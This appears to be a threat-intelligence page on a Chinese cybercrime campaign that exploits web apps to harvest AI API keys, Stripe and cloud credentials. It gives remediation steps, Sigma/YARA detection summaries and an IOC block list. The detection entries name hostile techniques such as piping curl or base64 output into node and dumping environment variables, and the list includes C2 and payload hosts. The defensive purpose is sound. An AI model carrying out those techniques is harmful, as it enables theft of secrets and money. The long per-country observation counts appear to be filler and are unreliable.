Campaigns
Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation

Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation

OpenClawLog4ShellReact2ShellChinese Cybercrime
An automated Chinese cybercrime infrastructure blends large-scale exploitation with structured orchestration and direct monetization. Coordinated through a centralized backend and an agent-based workflow system, the operation conducts internet-scale reconnaissance via FOFA and 360Quake, exploits vulnerable web applications using React2Shell extracts AI API keys, Stripe credentials and database secrets, and immediately validates stolen data for financial gain. Primary targets are Web3 platforms, fintech services and cloud-native organizations.

Indicators of Compromise

soft-silence-d978.13544681192.workers.dev
anson-aeromarine-ocularly.ngrok-free.dev
kf.unpkg.top

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

Remediation

Step

Action

Detail

1 -- Isolate

Network-isolate the affected server

Do not shut down -- keep running to preserve memory (NKN agent is fileless). Block all IOCs at perimeter. Terminate active sessions.

2 -- Preserve

Collect forensic evidence

Memory dump (avml/LiME). Preserve: bash_history, /tmp contents, web server logs, netstat -anp, /proc/*/cmdline. Take disk image before cleanup.

3 -- Hunt

Search and remove all persistence mechanisms

Kill and delete from /tmp: d2, pl, l64, cf-client, p2p-client. Scan web directories for webshells (.php, .jsp, .aspx). Check cron jobs and systemd services. Run YARA 7.1-7.4 on all web servers in the same network segment.

4 -- Rotate

Rotate every credential on the affected system

AI API keys (OpenAI, Anthropic, Gemini, Azure, DeepSeek, Moonshot, Firecrawl), Stripe sk_live_* keys, GitHub tokens, DB passwords, AWS access keys. Check Stripe Logs for /v1/balance calls and unauthorized charges.

5 -- Audit

Audit API usage for active key abuse

OpenAI/Anthropic usage dashboards: look for off-hours spikes or unknown IPs. Stripe Logs: filter /v1/account and /v1/balance calls. GitHub Security Log: unauthorized API calls or repo access. AWS CloudTrail: unexpected Lambda invocations.

6 -- Rebuild

Rebuild from a trusted clean image

Do not restore from the compromised disk. Deploy application code from version control. Inject secrets via Secrets Manager -- never use .env again on internet-exposed servers. Validate CVE patches before bringing the new instance online.



Sector-Specific Priority Actions

Sector

Key Risk

Priority Action

Web3 / Crypto

Primary FOFA target; ~100K crypto addresses monitored by attacker

Rotate wallet integration keys. Audit smart contract access logs. Verify no unauthorized address monitoring.

Fintech / Payments

Stripe sk_live_* keys validated and tested within hours of harvest

Check Stripe Logs for /v1/account and /v1/balance calls NOW. Rotate all live Stripe keys. Enable Radar fraud rules.

AI / ML Platforms

OpenAI, Anthropic, Gemini, DeepSeek, Moonshot, Firecrawl keys are the primary harvest target

Rotate all AI keys immediately. Check usage dashboards for abnormal consumption. Set spend alerts per key.

Cloud-Native / SaaS

AWS Lambda credentials, DATABASE_URL, GitHub tokens harvested -- enables cloud lateral movement

CloudTrail: unauthorized Lambda calls. GitHub: token misuse and secret scanning alerts. Rotate all cloud credentials.

Security Vendors

Explicitly targeted in FOFA queries; hold customer intelligence and elevated trust relationships

Audit FOFA visibility. Patch all internet-exposed React and Java apps. Review customer data access logs.



Detection Quick Reference

Rule

Type

Detects

Priority

Sigma-8.1

SIEM

Env variable dump executed from web server process -- direct exploitation indicator

CRITICAL

Sigma-8.2

SIEM

curl URL | node or echo base64 | node -- fileless NKN C2 agent delivery

HIGH

Sigma-8.3

SIEM

cf-client + trycloudflare.com -- Cloudflare tunnel SSH persistence

HIGH

Sigma-8.4

SIEM

Outbound connection to nkn.org:30003 -- decentralized C2; no legitimate enterprise use

HIGH

Sigma-8.5

SIEM

api.stripe.com + sk_live_ in process cmd -- stolen Stripe key validation

CRITICAL

YARA-7.1

EDR

React2Shell exploit scripts (3.py / 11.py): FOFA keywords, WAF bypass, env dump

HIGH

YARA-7.2

EDR

NKN fileless C2 agent: mainnet-seed addresses, CONTROL_ID, workers.dev, Node crypto

HIGH

YARA-7.3

EDR

Credential harvest file: AI API key names, Stripe strings, harvested_keys pattern

HIGH

YARA-7.4

EDR

Persistence: cf-client + trycloudflare.com, p2p-client + mayun, /tmp/l64 drop path

HIGH

IOC Block List

Indicator

Type

Block Method

124[.]220[.]164[.]14

C2 IP / Reverse Shell (port 33306)

Firewall egress -- all ports

soft-silence-d978[.]13544681192[.]workers[.]dev

Fileless C2 Delivery

DNS block + proxy filter

d6[.]tfdl[.]net

Payload Delivery (NKN agent, cf-client)

DNS block + proxy filter

anson-aeromarine-ocularly[.]ngrok-free[.]dev

Tor Proxy Endpoint

DNS block

kf[.]unpkg[.]top

Malicious Domain

DNS block

deltajohnsons[.]com

FOFA Account Registration Domain

DNS block + threat intel feed

*.nkn.org port 30003

NKN P2P C2 Seed Nodes

Firewall: block outbound port 30003

[email protected]

Operator Email

Threat intel feed

[email protected]

Operator Account

Threat intel feed

Observed Countries250

AD (242)
AE (475)
AF (929)
AG (704)
AI (762)
AL (840)
AM (286)
AO (718)
AQ (340)
AR (830)
AS (706)
AT (815)
AU (482)
AW (357)
AX (225)
AZ (296)
BA (483)
BB (940)
BD (11)
BE (558)
BF (910)
BG (907)
BH (5)
BI (839)
BJ (804)
BL (792)
BM (273)
BN (753)
BO (70)
BQ (556)
BR (861)
BS (474)
BT (722)
BV (950)
BW (300)
BY (136)
BZ (327)
CA (773)
CC (655)
CD (730)
CF (933)
CG (470)
CH (683)
CI (643)
CK (874)
CL (353)
CM (167)
CN (93)
CO (202)
CR (896)
CU (538)
CV (167)
CW (86)
CX (241)
CY (88)
CZ (478)
DE (14)
DJ (952)
DK (414)
DM (118)
DO (182)
DZ (475)
EC (95)
EE (994)
EG (390)
EH (206)
ER (469)
ES (353)
ET (679)
FI (140)
FJ (487)
FK (218)
FM (182)
FO (797)
FR (941)
GA (782)
GB (373)
GD (790)
GE (726)
GF (379)
GG (671)
GH (642)
GI (662)
GL (568)
GM (883)
GN (973)
GP (101)
GQ (916)
GR (378)
GS (438)
GT (767)
GU (343)
GW (345)
GY (679)
HK (218)
HM (626)
HN (611)
HR (380)
HT (954)
HU (598)
ID (391)
IE (377)
IL (577)
IM (406)
IN (99)
IO (628)
IQ (963)
IR (961)
IS (321)
IT (153)
JE (282)
JM (750)
JO (989)
JP (574)
KE (690)
KG (478)
KH (795)
KI (252)
KM (610)
KN (228)
KP (670)
KR (445)
KW (601)
KY (632)
KZ (417)
LA (159)
LB (80)
LC (871)
LI (295)
LK (942)
LR (562)
LS (972)
LT (702)
LU (234)
LV (934)
LY (232)
MA (700)
MC (544)
MD (960)
ME (396)
MF (475)
MG (286)
MH (541)
MK (772)
ML (312)
MM (555)
MN (476)
MO (48)
MP (13)
MQ (751)
MR (265)
MS (94)
MT (550)
MU (978)
MV (849)
MW (761)
MX (777)
MY (542)
MZ (625)
NA (766)
NC (731)
NE (358)
NF (226)
NG (585)
NI (397)
NL (630)
NO (443)
NP (117)
NR (836)
NU (809)
NZ (494)
OM (690)
PA (340)
PE (767)
PF (590)
PG (789)
PH (713)
PK (19)
PL (668)
PM (913)
PN (205)
PR (885)
PS (132)
PT (272)
PW (674)
PY (21)
QA (46)
RE (626)
RO (848)
RS (731)
RU (459)
RW (411)
SA (343)
SB (528)
SC (385)
SD (304)
SE (458)
SG (179)
SH (204)
SI (407)
SJ (622)
SK (41)
SL (438)
SM (705)
SN (998)
SO (795)
SR (923)
SS (849)
ST (162)
SV (379)
SX (749)
SY (26)
SZ (983)
TC (477)
TD (429)
TF (114)
TG (841)
TH (852)
TJ (660)
TK (200)
TL (68)
TM (590)
TN (236)
TO (798)
TR (542)
TT (186)
TV (74)
TW (526)
TZ (942)
UA (354)
UG (47)
UM (772)
US (422)
UY (484)
UZ (146)
VA (634)
VC (681)
VE (593)
VG (293)
VI (491)
VN (488)
VU (494)
WF (289)
WS (969)
XK (237)
YE (32)
YT (272)
ZA (491)
ZM (701)
ZW (21)